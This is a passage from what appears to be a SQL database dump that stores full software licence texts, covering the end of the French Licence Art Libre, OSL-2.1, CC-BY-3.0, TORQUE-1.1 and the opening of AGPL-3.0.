propres\nfaits.\n\n 8. LA DURÉE DE LA LICENCE.\n\nCette licence prend effet dès votre acceptation de ses dispositions. Le fait\nde copier, de diffuser, ou de modifier l\'œuvre constitue une acceptation tacite.\n\nCette licence a pour durée la durée des droits d\'auteur attachés à l\'œuvre.\nSi vous ne respectez pas les termes de cette licence, vous perdez automatiquement\nles droits qu\'elle vous confère.\n\nSi le régime juridique auquel vous êtes soumis ne vous permet pas de respecter\nles termes de cette licence, vous ne pouvez pas vous prévaloir des libertés\nqu\'elle confère.\n\n 9. LES DIFFÉRENTES VERSIONS DE LA LICENCE.\n\nCette licence pourra être modifiée régulièrement, en vue de son amélioration,\npar ses auteurs (les acteurs du mouvement Copyleft Attitude) sous la forme\nde nouvelles versions numérotées.\n\nVous avez toujours le choix entre vous contenter des dispositions contenues\ndans la version de la LAL sous laquelle la copie vous a été communiquée ou\nalors, vous prévaloir des dispositions d\'une des versions ultérieures.\n\n 10. LES SOUS-LICENCES.\n\nLes sous-licences ne sont pas autorisées par la présente. Toute personne qui\nsouhaite bénéficier des libertés qu\'elle confère sera liée directement aux\nauteurs de l\'œuvre commune.\n\n 11. LE CONTEXTE JURIDIQUE.\n\nCette licence est rédigée en référence au droit français et à la Convention\nde Berne relative au droit d\'auteur.\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(241,'OSL-2.1','The Open Software Licensev. 2.1\n\nThis Open Software License (the \"License\") applies to any original work of\nauthorship (the \"Original Work\") whose owner (the \"Licensor\") has placed the\nfollowing notice immediately following the copyright notice for the Original\nWork:\n\nLicensed under the Open Software License version 2.1\n\n1) Grant of Copyright License. Licensor hereby grants You a world-wide, royalty-free,\nnon-exclusive, perpetual, sublicenseable license to do the following:\n\n a) to reproduce the Original Work in copies;\n\nb) to prepare derivative works (\"Derivative Works\") based upon the Original\nWork;\n\nc) to distribute copies of the Original Work and Derivative Works to the public,\nwith the proviso that copies of Original Work or Derivative Works that You\ndistribute shall be licensed under the Open Software License;\n\n d) to perform the Original Work publicly; and\n\n e) to display the Original Work publicly.\n\n2) Grant of Patent License. Licensor hereby grants You a world-wide, royalty-free,\nnon-exclusive, perpetual, sublicenseable license, under patent claims owned\nor controlled by the Licensor that are embodied in the Original Work as furnished\nby the Licensor, to make, use, sell and offer for sale the Original Work and\nDerivative Works.\n\n3) Grant of Source Code License. The term \"Source Code\" means the preferred\nform of the Original Work for making modifications to it and all available\ndocumentation describing how to modify the Original Work. Licensor hereby\nagrees to provide a machine-readable copy of the Source Code of the Original\nWork along with each copy of the Original Work that Licensor distributes.\nLicensor reserves the right to satisfy this obligation by placing a machine-readable\ncopy of the Source Code in an information repository reasonably calculated\nto permit inexpensive and convenient access by You for as long as Licensor\ncontinues to distribute the Original Work, and by publishing the address of\nthat information repository in a notice immediately following the copyright\nnotice that applies to the Original Work.\n\n4) Exclusions From License Grant. Neither the names of Licensor, nor the names\nof any contributors to the Original Work, nor any of their trademarks or service\nmarks, may be used to endorse or promote products derived from this Original\nWork without express prior written permission of the Licensor. Nothing in\nthis License shall be deemed to grant any rights to trademarks, copyrights,\npatents, trade secrets or any other intellectual property of Licensor except\nas expressly stated herein. No patent license is granted to make, use, sell\nor offer to sell embodiments of any patent claims other than the licensed\nclaims defined in Section 2. No right is granted to the trademarks of Licensor\neven if such marks are included in the Original Work. Nothing in this License\nshall be interpreted to prohibit Licensor from licensing under different terms\nfrom this License any Original Work that Licensor otherwise would have a right\nto license.\n\n5) External Deployment. The term \"External Deployment\" means the use or distribution\nof the Original Work or Derivative Works in any way such that the Original\nWork or Derivative Works may be used by anyone other than You, whether the\nOriginal Work or Derivative Works are distributed to those persons or made\navailable as an application intended for use over a computer network. As an\nexpress condition for the grants of license hereunder, You agree that any\nExternal Deployment by You of a Derivative Work shall be deemed a distribution\nand shall be licensed to all under the terms of this License, as prescribed\nin section 1(c) herein.\n\n6) Attribution Rights. You must retain, in the Source Code of any Derivative\nWorks that You create, all copyright, patent or trademark notices from the\nSource Code of the Original Work, as well as any notices of licensing and\nany descriptive text identified therein as an \"Attribution Notice.\" You must\ncause the Source Code for any Derivative Works that You create to carry a\nprominent Attribution Notice reasonably calculated to inform recipients that\nYou have modified the Original Work.\n\n7) Warranty of Provenance and Disclaimer of Warranty. Licensor warrants that\nthe copyright in and to the Original Work and the patent rights granted herein\nby Licensor are owned by the Licensor or are sublicensed to You under the\nterms of this License with the permission of the contributor(s) of those copyrights\nand patent rights. Except as expressly stated in the immediately proceeding\nsentence, the Original Work is provided under this License on an \"AS IS\" BASIS\nand WITHOUT WARRANTY, either express or implied, including, without limitation,\nthe warranties of NON-INFRINGEMENT, MERCHANTABILITY or FITNESS FOR A PARTICULAR\nPURPOSE. THE ENTIRE RISK AS TO THE QUALITY OF THE ORIGINAL WORK IS WITH YOU.\nThis DISCLAIMER OF WARRANTY constitutes an essential part of this License.\nNo license to Original Work is granted hereunder except under this disclaimer.\n\n8) Limitation of Liability. Under no circumstances and under no legal theory,\nwhether in tort (including negligence), contract, or otherwise, shall the\nLicensor be liable to any person for any direct, indirect, special, incidental,\nor consequential damages of any character arising as a result of this License\nor the use of the Original Work including, without limitation, damages for\nloss of goodwill, work stoppage, computer failure or malfunction, or any and\nall other commercial damages or losses. This limitation of liability shall\nnot apply to liability for death or personal injury resulting from Licensor\'s\nnegligence to the extent applicable law prohibits such limitation. Some jurisdictions\ndo not allow the exclusion or limitation of incidental or consequential damages,\nso this exclusion and limitation may not apply to You.\n\n9) Acceptance and Termination. If You distribute copies of the Original Work\nor a Derivative Work, You must make a reasonable effort under the circumstances\nto obtain the express assent of recipients to the terms of this License. Nothing\nelse but this License (or another written agreement between Licensor and You)\ngrants You permission to create Derivative Works based upon the Original Work\nor to exercise any of the rights granted in Section 1 herein, and any attempt\nto do so except under the terms of this License (or another written agreement\nbetween Licensor and You) is expressly prohibited by U.S. copyright law, the\nequivalent laws of other countries, and by international treaty. Therefore,\nby exercising any of the rights granted to You in Section 1 herein, You indicate\nYour acceptance of this License and all of its terms and conditions. This\nLicense shall terminate immediately and you may no longer exercise any of\nthe rights granted to You by this License upon Your failure to honor the proviso\nin Section 1(c) herein.\n\n10) Termination for Patent Action. This License shall terminate automatically\nand You may no longer exercise any of the rights granted to You by this License\nas of the date You commence an action, including a cross-claim or counterclaim,\nagainst Licensor or any licensee alleging that the Original Work infringes\na patent. This termination provision shall not apply for an action alleging\npatent infringement by combinations of the Original Work with other software\nor hardware.\n\n11) Jurisdiction, Venue and Governing Law. Any action or suit relating to\nthis License may be brought only in the courts of a jurisdiction wherein the\nLicensor resides or in which Licensor conducts its primary business, and under\nthe laws of that jurisdiction excluding its conflict-of-law provisions. The\napplication of the United Nations Convention on Contracts for the International\nSale of Goods is expressly excluded. Any use of the Original Work outside\nthe scope of this License or after its termination shall be subject to the\nrequirements and penalties of the U.S. Copyright Act, 17 U.S.C. § 101 et seq.,\nthe equivalent laws of other countries, and international treaty. This section\nshall survive the termination of this License.\n\n12) Attorneys Fees. In any action to enforce the terms of this License or\nseeking damages relating thereto, the prevailing party shall be entitled to\nrecover its costs and expenses, including, without limitation, reasonable\nattorneys\' fees and costs incurred in connection with such action, including\nany appeal of such action. This section shall survive the termination of this\nLicense.\n\n13) Miscellaneous. This License represents the complete agreement concerning\nthe subject matter hereof. If any provision of this License is held to be\nunenforceable, such provision shall be reformed only to the extent necessary\nto make it enforceable.\n\n14) Definition of \"You\" in This License. \"You\" throughout this License, whether\nin upper or lower case, means an individual or a legal entity exercising rights\nunder, and complying with all of the terms of, this License. For legal entities,\n\"You\" includes any entity that controls, is controlled by, or is under common\ncontrol with you. For purposes of this definition, \"control\" means (i) the\npower, direct or indirect, to cause the direction or management of such entity,\nwhether by contract or otherwise, or (ii) ownership of fifty percent (50%)\nor more of the outstanding shares, or (iii) beneficial ownership of such entity.\n\n15) Right to Use. You may use the Original Work in all ways not otherwise\nrestricted or conditioned by this License or by law, and Licensor promises\nnot to interfere with or be responsible for such uses by You.\n\nThis license is Copyright (C) 2003-2004 Lawrence E. Rosen. All rights reserved.\nPermission is hereby granted to copy and distribute this license without modification.\nThis license may not be modified without the express written permission of\nits copyright owner.\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(242,'CC-BY-3.0','Creative Commons Attribution 3.0 Unported CREATIVE COMMONS CORPORATION IS\nNOT A LAW FIRM AND DOES NOT PROVIDE LEGAL SERVICES. DISTRIBUTION OF THIS LICENSE\nDOES NOT CREATE AN ATTORNEY-CLIENT RELATIONSHIP. CREATIVE COMMONS PROVIDES\nTHIS INFORMATION ON AN \"AS-IS\" BASIS. CREATIVE COMMONS MAKES NO WARRANTIES\nREGARDING THE INFORMATION PROVIDED, AND DISCLAIMS LIABILITY FOR DAMAGES RESULTING\nFROM ITS USE.\n\nLicense\n\nTHE WORK (AS DEFINED BELOW) IS PROVIDED UNDER THE TERMS OF THIS CREATIVE COMMONS\nPUBLIC LICENSE (\"CCPL\" OR \"LICENSE\"). THE WORK IS PROTECTED BY COPYRIGHT AND/OR\nOTHER APPLICABLE LAW. ANY USE OF THE WORK OTHER THAN AS AUTHORIZED UNDER THIS\nLICENSE OR COPYRIGHT LAW IS PROHIBITED.\n\nBY EXERCISING ANY RIGHTS TO THE WORK PROVIDED HERE, YOU ACCEPT AND AGREE TO\nBE BOUND BY THE TERMS OF THIS LICENSE. TO THE EXTENT THIS LICENSE MAY BE CONSIDERED\nTO BE A CONTRACT, THE LICENSOR GRANTS YOU THE RIGHTS CONTAINED HERE IN CONSIDERATION\nOF YOUR ACCEPTANCE OF SUCH TERMS AND CONDITIONS.\n\n 1. Definitions\n\na. \"Adaptation\" means a work based upon the Work, or upon the Work and other\npre-existing works, such as a translation, adaptation, derivative work, arrangement\nof music or other alterations of a literary or artistic work, or phonogram\nor performance and includes cinematographic adaptations or any other form\nin which the Work may be recast, transformed, or adapted including in any\nform recognizably derived from the original, except that a work that constitutes\na Collection will not be considered an Adaptation for the purpose of this\nLicense. For the avoidance of doubt, where the Work is a musical work, performance\nor phonogram, the synchronization of the Work in timed-relation with a moving\nimage (\"synching\") will be considered an Adaptation for the purpose of this\nLicense.\n\nb. \"Collection\" means a collection of literary or artistic works, such as\nencyclopedias and anthologies, or performances, phonograms or broadcasts,\nor other works or subject matter other than works listed in Section 1(f) below,\nwhich, by reason of the selection and arrangement of their contents, constitute\nintellectual creations, in which the Work is included in its entirety in unmodified\nform along with one or more other contributions, each constituting separate\nand independent works in themselves, which together are assembled into a collective\nwhole. A work that constitutes a Collection will not be considered an Adaptation\n(as defined above) for the purposes of this License.\n\nc. \"Distribute\" means to make available to the public the original and copies\nof the Work or Adaptation, as appropriate, through sale or other transfer\nof ownership.\n\nd. \"Licensor\" means the individual, individuals, entity or entities that offer(s)\nthe Work under the terms of this License.\n\ne. \"Original Author\" means, in the case of a literary or artistic work, the\nindividual, individuals, entity or entities who created the Work or if no\nindividual or entity can be identified, the publisher; and in addition (i)\nin the case of a performance the actors, singers, musicians, dancers, and\nother persons who act, sing, deliver, declaim, play in, interpret or otherwise\nperform literary or artistic works or expressions of folklore; (ii) in the\ncase of a phonogram the producer being the person or legal entity who first\nfixes the sounds of a performance or other sounds; and, (iii) in the case\nof broadcasts, the organization that transmits the broadcast.\n\nf. \"Work\" means the literary and/or artistic work offered under the terms\nof this License including without limitation any production in the literary,\nscientific and artistic domain, whatever may be the mode or form of its expression\nincluding digital form, such as a book, pamphlet and other writing; a lecture,\naddress, sermon or other work of the same nature; a dramatic or dramatico-musical\nwork; a choreographic work or entertainment in dumb show; a musical composition\nwith or without words; a cinematographic work to which are assimilated works\nexpressed by a process analogous to cinematography; a work of drawing, painting,\narchitecture, sculpture, engraving or lithography; a photographic work to\nwhich are assimilated works expressed by a process analogous to photography;\na work of applied art; an illustration, map, plan, sketch or three-dimensional\nwork relative to geography, topography, architecture or science; a performance;\na broadcast; a phonogram; a compilation of data to the extent it is protected\nas a copyrightable work; or a work performed by a variety or circus performer\nto the extent it is not otherwise considered a literary or artistic work.\n\ng. \"You\" means an individual or entity exercising rights under this License\nwho has not previously violated the terms of this License with respect to\nthe Work, or who has received express permission from the Licensor to exercise\nrights under this License despite a previous violation.\n\nh. \"Publicly Perform\" means to perform public recitations of the Work and\nto communicate to the public those public recitations, by any means or process,\nincluding by wire or wireless means or public digital performances; to make\navailable to the public Works in such a way that members of the public may\naccess these Works from a place and at a place individually chosen by them;\nto perform the Work to the public by any means or process and the communication\nto the public of the performances of the Work, including by public digital\nperformance; to broadcast and rebroadcast the Work by any means including\nsigns, sounds or images.\n\ni. \"Reproduce\" means to make copies of the Work by any means including without\nlimitation by sound or visual recordings and the right of fixation and reproducing\nfixations of the Work, including storage of a protected performance or phonogram\nin digital form or other electronic medium.\n\n2. Fair Dealing Rights. Nothing in this License is intended to reduce, limit,\nor restrict any uses free from copyright or rights arising from limitations\nor exceptions that are provided for in connection with the copyright protection\nunder copyright law or other applicable laws.\n\n3. License Grant. Subject to the terms and conditions of this License, Licensor\nhereby grants You a worldwide, royalty-free, non-exclusive, perpetual (for\nthe duration of the applicable copyright) license to exercise the rights in\nthe Work as stated below:\n\na. to Reproduce the Work, to incorporate the Work into one or more Collections,\nand to Reproduce the Work as incorporated in the Collections;\n\nb. to create and Reproduce Adaptations provided that any such Adaptation,\nincluding any translation in any medium, takes reasonable steps to clearly\nlabel, demarcate or otherwise identify that changes were made to the original\nWork. For example, a translation could be marked \"The original work was translated\nfrom English to Spanish,\" or a modification could indicate \"The original work\nhas been modified.\";\n\nc. to Distribute and Publicly Perform the Work including as incorporated in\nCollections; and,\n\n d. to Distribute and Publicly Perform Adaptations.\n\n e. For the avoidance of doubt:\n\ni. Non-waivable Compulsory License Schemes. In those jurisdictions in which\nthe right to collect royalties through any statutory or compulsory licensing\nscheme cannot be waived, the Licensor reserves the exclusive right to collect\nsuch royalties for any exercise by You of the rights granted under this License;\n\nii. Waivable Compulsory License Schemes. In those jurisdictions in which the\nright to collect royalties through any statutory or compulsory licensing scheme\ncan be waived, the Licensor waives the exclusive right to collect such royalties\nfor any exercise by You of the rights granted under this License; and,\n\niii. Voluntary License Schemes. The Licensor waives the right to collect royalties,\nwhether individually or, in the event that the Licensor is a member of a collecting\nsociety that administers voluntary licensing schemes, via that society, from\nany exercise by You of the rights granted under this License.\n\nThe above rights may be exercised in all media and formats whether now known\nor hereafter devised. The above rights include the right to make such modifications\nas are technically necessary to exercise the rights in other media and formats.\nSubject to Section 8(f), all rights not expressly granted by Licensor are\nhereby reserved.\n\n4. Restrictions. The license granted in Section 3 above is expressly made\nsubject to and limited by the following restrictions:\n\na. You may Distribute or Publicly Perform the Work only under the terms of\nthis License. You must include a copy of, or the Uniform Resource Identifier\n(URI) for, this License with every copy of the Work You Distribute or Publicly\nPerform. You may not offer or impose any terms on the Work that restrict the\nterms of this License or the ability of the recipient of the Work to exercise\nthe rights granted to that recipient under the terms of the License. You may\nnot sublicense the Work. You must keep intact all notices that refer to this\nLicense and to the disclaimer of warranties with every copy of the Work You\nDistribute or Publicly Perform. When You Distribute or Publicly Perform the\nWork, You may not impose any effective technological measures on the Work\nthat restrict the ability of a recipient of the Work from You to exercise\nthe rights granted to that recipient under the terms of the License. This\nSection 4(a) applies to the Work as incorporated in a Collection, but this\ndoes not require the Collection apart from the Work itself to be made subject\nto the terms of this License. If You create a Collection, upon notice from\nany Licensor You must, to the extent practicable, remove from the Collection\nany credit as required by Section 4(b), as requested. If You create an Adaptation,\nupon notice from any Licensor You must, to the extent practicable, remove\nfrom the Adaptation any credit as required by Section 4(b), as requested.\n\nb. If You Distribute, or Publicly Perform the Work or any Adaptations or Collections,\nYou must, unless a request has been made pursuant to Section 4(a), keep intact\nall copyright notices for the Work and provide, reasonable to the medium or\nmeans You are utilizing: (i) the name of the Original Author (or pseudonym,\nif applicable) if supplied, and/or if the Original Author and/or Licensor\ndesignate another party or parties (e.g., a sponsor institute, publishing\nentity, journal) for attribution (\"Attribution Parties\") in Licensor\'s copyright\nnotice, terms of service or by other reasonable means, the name of such party\nor parties; (ii) the title of the Work if supplied; (iii) to the extent reasonably\npracticable, the URI, if any, that Licensor specifies to be associated with\nthe Work, unless such URI does not refer to the copyright notice or licensing\ninformation for the Work; and (iv), consistent with Section 3(b), in the case\nof an Adaptation, a credit identifying the use of the Work in the Adaptation\n(e.g., \"French translation of the Work by Original Author,\" or \"Screenplay\nbased on original Work by Original Author\"). The credit required by this Section\n4 (b) may be implemented in any reasonable manner; provided, however, that\nin the case of a Adaptation or Collection, at a minimum such credit will appear,\nif a credit for all contributing authors of the Adaptation or Collection appears,\nthen as part of these credits and in a manner at least as prominent as the\ncredits for the other contributing authors. For the avoidance of doubt, You\nmay only use the credit required by this Section for the purpose of attribution\nin the manner set out above and, by exercising Your rights under this License,\nYou may not implicitly or explicitly assert or imply any connection with,\nsponsorship or endorsement by the Original Author, Licensor and/or Attribution\nParties, as appropriate, of You or Your use of the Work, without the separate,\nexpress prior written permission of the Original Author, Licensor and/or Attribution\nParties.\n\nc. Except as otherwise agreed in writing by the Licensor or as may be otherwise\npermitted by applicable law, if You Reproduce, Distribute or Publicly Perform\nthe Work either by itself or as part of any Adaptations or Collections, You\nmust not distort, mutilate, modify or take other derogatory action in relation\nto the Work which would be prejudicial to the Original Author\'s honor or reputation.\nLicensor agrees that in those jurisdictions (e.g. Japan), in which any exercise\nof the right granted in Section 3(b) of this License (the right to make Adaptations)\nwould be deemed to be a distortion, mutilation, modification or other derogatory\naction prejudicial to the Original Author\'s honor and reputation, the Licensor\nwill waive or not assert, as appropriate, this Section, to the fullest extent\npermitted by the applicable national law, to enable You to reasonably exercise\nYour right under Section 3(b) of this License (right to make Adaptations)\nbut not otherwise.\n\n 5. Representations, Warranties and Disclaimer\n\nUNLESS OTHERWISE MUTUALLY AGREED TO BY THE PARTIES IN WRITING, LICENSOR OFFERS\nTHE WORK AS-IS AND MAKES NO REPRESENTATIONS OR WARRANTIES OF ANY KIND CONCERNING\nTHE WORK, EXPRESS, IMPLIED, STATUTORY OR OTHERWISE, INCLUDING, WITHOUT LIMITATION,\nWARRANTIES OF TITLE, MERCHANTIBILITY, FITNESS FOR A PARTICULAR PURPOSE, NONINFRINGEMENT,\nOR THE ABSENCE OF LATENT OR OTHER DEFECTS, ACCURACY, OR THE PRESENCE OF ABSENCE\nOF ERRORS, WHETHER OR NOT DISCOVERABLE. SOME JURISDICTIONS DO NOT ALLOW THE\nEXCLUSION OF IMPLIED WARRANTIES, SO SUCH EXCLUSION MAY NOT APPLY TO YOU.\n\n6. Limitation on Liability. EXCEPT TO THE EXTENT REQUIRED BY APPLICABLE LAW,\nIN NO EVENT WILL LICENSOR BE LIABLE TO YOU ON ANY LEGAL THEORY FOR ANY SPECIAL,\nINCIDENTAL, CONSEQUENTIAL, PUNITIVE OR EXEMPLARY DAMAGES ARISING OUT OF THIS\nLICENSE OR THE USE OF THE WORK, EVEN IF LICENSOR HAS BEEN ADVISED OF THE POSSIBILITY\nOF SUCH DAMAGES.\n\n 7. Termination\n\na. This License and the rights granted hereunder will terminate automatically\nupon any breach by You of the terms of this License. Individuals or entities\nwho have received Adaptations or Collections from You under this License,\nhowever, will not have their licenses terminated provided such individuals\nor entities remain in full compliance with those licenses. Sections 1, 2,\n5, 6, 7, and 8 will survive any termination of this License.\n\nb. Subject to the above terms and conditions, the license granted here is\nperpetual (for the duration of the applicable copyright in the Work). Notwithstanding\nthe above, Licensor reserves the right to release the Work under different\nlicense terms or to stop distributing the Work at any time; provided, however\nthat any such election will not serve to withdraw this License (or any other\nlicense that has been, or is required to be, granted under the terms of this\nLicense), and this License will continue in full force and effect unless terminated\nas stated above.\n\n 8. Miscellaneous\n\na. Each time You Distribute or Publicly Perform the Work or a Collection,\nthe Licensor offers to the recipient a license to the Work on the same terms\nand conditions as the license granted to You under this License.\n\nb. Each time You Distribute or Publicly Perform an Adaptation, Licensor offers\nto the recipient a license to the original Work on the same terms and conditions\nas the license granted to You under this License.\n\nc. If any provision of this License is invalid or unenforceable under applicable\nlaw, it shall not affect the validity or enforceability of the remainder of\nthe terms of this License, and without further action by the parties to this\nagreement, such provision shall be reformed to the minimum extent necessary\nto make such provision valid and enforceable.\n\nd. No term or provision of this License shall be deemed waived and no breach\nconsented to unless such waiver or consent shall be in writing and signed\nby the party to be charged with such waiver or consent. This License constitutes\nthe entire agreement between the parties with respect to the Work licensed\nhere. There are no understandings, agreements or representations with respect\nto the Work not specified here. Licensor shall not be bound by any additional\nprovisions that may appear in any communication from You.\n\ne. This License may not be modified without the mutual written agreement of\nthe Licensor and You.\n\nf. The rights granted under, and the subject matter referenced, in this License\nwere drafted utilizing the terminology of the Berne Convention for the Protection\nof Literary and Artistic Works (as amended on September 28, 1979), the Rome\nConvention of 1961, the WIPO Copyright Treaty of 1996, the WIPO Performances\nand Phonograms Treaty of 1996 and the Universal Copyright Convention (as revised\non July 24, 1971). These rights and subject matter take effect in the relevant\njurisdiction in which the License terms are sought to be enforced according\nto the corresponding provisions of the implementation of those treaty provisions\nin the applicable national law. If the standard suite of rights granted under\napplicable copyright law includes additional rights not granted under this\nLicense, such additional rights are deemed to be included in the License;\nthis License is not intended to restrict the license of any rights under applicable\nlaw.\n\nCreative Commons Notice\n\nCreative Commons is not a party to this License, and makes no warranty whatsoever\nin connection with the Work. Creative Commons will not be liable to You or\nany party on any legal theory for any damages whatsoever, including without\nlimitation any general, special, incidental or consequential damages arising\nin connection to this license. Notwithstanding the foregoing two (2) sentences,\nif Creative Commons has expressly identified itself as the Licensor hereunder,\nit shall have all rights and obligations of Licensor.\n\nExcept for the limited purpose of indicating to the public that the Work is\nlicensed under the CCPL, Creative Commons does not authorize the use by either\nparty of the trademark \"Creative Commons\" or any related trademark or logo\nof Creative Commons without the prior written consent of Creative Commons.\nAny permitted use will be in compliance with Creative Commons\' then-current\ntrademark usage guidelines, as may be published on its website or otherwise\nmade available upon request from time to time. For the avoidance of doubt,\nthis trademark restriction does not form part of this License.\n\nCreative Commons may be contacted at http://creativecommons.org/.\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(243,'TORQUE-1.1','TORQUE v2.5+ Software License v1.1\n\nCopyright (c) 2010-2011 Adaptive Computing Enterprises, Inc. All rights reserved.\nUse this license to use or redistribute the TORQUE software v2.5+ and later\nversions. For free support for TORQUE users, questions should be emailed to\nthe community of TORQUE users at torqueusers@supercluster.org. Users can also\nsubscribe to the user mailing list at http://www.supercluster.org/mailman/listinfo/torqueusers.\nCustomers using TORQUE that also are licensed users of Moab branded software\nfrom Adaptive Computing Inc. can get TORQUE support from Adaptive Computing\nvia:\n\nEmail: torque-support@adaptivecomputing.com.\n\nPhone: (801) 717-3700\n\nWeb: www.adaptivecomputing.com www.clusterresources.com\n\nThis license covers use of the TORQUE v2.5 software (the \"Software\") at your\nsite or location, and, for certain users, redistribution of the Software to\nother sites and locations1. Later versions of TORQUE are also covered by this\nlicense. Use and redistribution of TORQUE v2.5 in source and binary forms,\nwith or without modification, are permitted provided that all of the following\nconditions are met.\n\n1. Any Redistribution of source code must retain the above copyright notice\nand the acknowledgment contained in paragraph 5, this list of conditions and\nthe disclaimer contained in paragraph 5.\n\n2. Any Redistribution in binary form must reproduce the above copyright notice\nand the acknowledgment contained in paragraph 4, this list of conditions and\nthe disclaimer contained in paragraph 5 in the documentation and/or other\nmaterials provided with the distribution.\n\n3. Redistributions in any form must be accompanied by information on how to\nobtain complete source code for TORQUE and any modifications and/or additions\nto TORQUE. The source code must either be included in the distribution or\nbe available for no more than the cost of distribution plus a nominal fee,\nand all modifications and additions to the Software must be freely redistributable\nby any party (including Licensor) without restriction.\n\n4. All advertising materials mentioning features or use of the Software must\ndisplay the following acknowledgment:\n\n\"TORQUE is a modification of OpenPBS which was developed by NASA Ames Research\nCenter, Lawrence Livermore National Laboratory, and Veridian TORQUE Open Source\nLicense v1.1. 1 Information Solutions, Inc. Visit www.clusterresources.com/products/\nfor more information about TORQUE and to download TORQUE. For information\nabout Moab branded products and so receive support from Adaptive Computing\nfor TORQUE, see www.adaptivecomputing.com.\"\n\n5. DISCLAIMER OF WARRANTY THIS SOFTWARE IS PROVIDED \"AS IS\" WITHOUT WARRANTY\nOF ANY KIND. ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED\nTO, THE IMPLIED WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE,\nAND NON-INFRINGEMENT ARE EXPRESSLY DISCLAIMED. IN NO EVENT SHALL ADAPTIVE\nCOMPUTING ENTERPRISES, INC. CORPORATION, ITS AFFILIATED COMPANIES, OR THE\nU.S. GOVERNMENT OR ANY OF ITS AGENCIES BE LIABLE FOR ANY DIRECT OR INDIRECT,\nINCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT\nLIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA,\nOR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF\nLIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\nOR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF\nADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\nThis license will be governed by the laws of Utah, without reference to its\nchoice of law rules. Note 1: TORQUE is developed from an earlier version v2.3\nof OpenPBS. TORQUE has been developed beyond OpenPBS v2.3. The OpenPBS v2.3\nlicense and OpenPBS software can be obtained at:\n\nhttp://www.pbsworks.com/ResLibSearchResult.aspx?keywords=openpbs&industry=All&pro\nduct_service=All&category=Free%20Software%20Downloads&order_by=title. Users\nof TORQUE should comply with the TORQUE license as well as the OpenPBS license.\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(244,'AGPL-3.0-or-later','GNU AFFERO GENERAL PUBLIC LICENSE\n\nVersion 3, 19 November 2007\n\nCopyright (C) 2007 Free Software Foundation, Inc. <http s ://fsf.org/>\n\nEveryone is permitted to copy and distribute verbatim copies of this license\ndocument, but changing it is not allowed.\n\nPreamble\n\nThe GNU Affero General Public License is a free, copyleft license for software\nand other kinds of works, specifically designed to ensure cooperation with\nthe community in the case of network server software.\n\nThe licenses for most software and other practical works are designed to take\naway your freedom to share and change the works. By contrast, our General\nPublic Licenses are intended to guarantee your freedom to share and change\nall versions of a program--to make sure it remains free software for all its\nusers.\n\nWhen we speak of free software, we are referring to freedom, not price. Our\nGeneral Public Licenses are designed to make sure that you have the freedom\nto distribute copies of free software (and charge for them if you wish), that\nyou receive source code or can get it if you want it, that you can change\nthe software or use pieces of it in new free programs, and that you know you\ncan do these things.\n\nDevelopers that use our General Public Licenses protect your rights with two\nsteps: (1) assert copyright on the software, and (2) offer you this License\nwhich gives you legal permission to copy, distribute and/or modify the software.\n\nA secondary benefit of defending all users\' freedom is that improvements made\nin alternate versions of the program, if they receive widespread use, become\navailable for other developers to incorporate. Many developers of free software\nare heartened and encouraged by the resulting cooperation. However, in the\ncase of software used on network servers, this result may fail to come about.\nThe GNU General Public License permits making a modified version and letting\nthe public access it on a server without ever releasing its source code to\nthe public.\n\nThe GNU Affero General Public License is designed specifically to ensure that,\nin such cases, the modified source code becomes available to the community.\nIt requires the operator of a network server to provide the source code of\nthe modified version running there to the users of that server. Therefore,\npublic use of a modified version, on a publicly accessible server, gives the\npublic access to the source code of the modified version.\n\nAn older license, called the Affero General Public License and published by\nAffero, was designed to accomplish similar goals. This is a different license,\nnot a version of the Affero GPL, but Affero has released a new version of\nthe Affero GPL which permits relicensing under this license.\n\nThe precise terms and conditions for copying, distribution and modification\nfollow.\n\nTERMS AND CONDITIONS\n\n 0. Definitions.\n\n \"This License\" refers to version 3 of the GNU Affero General Public License.\n\n\"Copyright\" also means copyright-like laws that apply to other kinds of works,\nsuch as semiconductor masks.\n\n\"The Program\" refers to any copyrightable work licensed under this License.\nEach licensee is addressed as \"you\". \"Licensees\" and \"recipients\" may be individuals\nor organizations.\n\nTo \"modify\" a work means to copy from or adapt all or part of the work in\na fashion requiring copyright permission, other than the making of an exact\ncopy. The resulting work is called a \"modified version\" of the earlier work\nor a work \"based on\" the earlier work.\n\nA \"covered work\" means either the unmodified Program or a work based on the\nProgram.\n\nTo \"propagate\" a work means to do anything with it that, without permission,\nwould make you directly or secondarily liable for infringement under applicable\ncopyright law, except executing it on a computer or modifying a private copy.\nPropagation includes copying, distribution (with or without modification),\nmaking available to the public, and in some countries other activities as\nwell.\n\nTo \"convey\" a work means any kind of propagation that enables other parties\nto make or receive copies. Mere interaction with a user through a computer\nnetwork, with no transfer of a copy, is not conveying.\n\nAn interactive user interface displays \"Appropriate Legal Notices\" to the\nextent that it includes a convenient and prominently visible feature that\n(1) displays an appropriate copyright notice, and (2) tells the user that\nthere is no warranty for the work (except to the extent that warranties are\nprovided), that licensees may convey the work under this License, and how\nto view a copy of this License. If the interface presents a list of user commands\nor options, such as a menu, a prominent item in the list meets this criterion.\n\n 1. Source Code.\n\nThe \"source code\" for a work means the preferred form of the work for making\nmodifications to it. \"Object code\" means any non-source form of a work.\n\nA \"Standard Interface\" means an interface that either is an official standard\ndefined by a recognized standards body, or, in the case of interfaces specified\nfor a particular programming language, one that is widely used among developers\nworking in that language.\n\nThe \"System Libraries\" of an executable work include anything, other than\nthe work as a whole, that (a) is included in the normal form of packaging\na Major Component, but which is not part of that Major Component, and (b)\nserves only to enable use of the work with that Major Component, or to implement\na Standard Interface for which an implementation is available to the public\nin source code form. A \"Major Component\", in this context, means a major essential\ncomponent (kernel, window system, and so on) of the specific operating system\n(if any) on which the executable work runs, or a compiler used to produce\nthe work, or an object code interpreter used 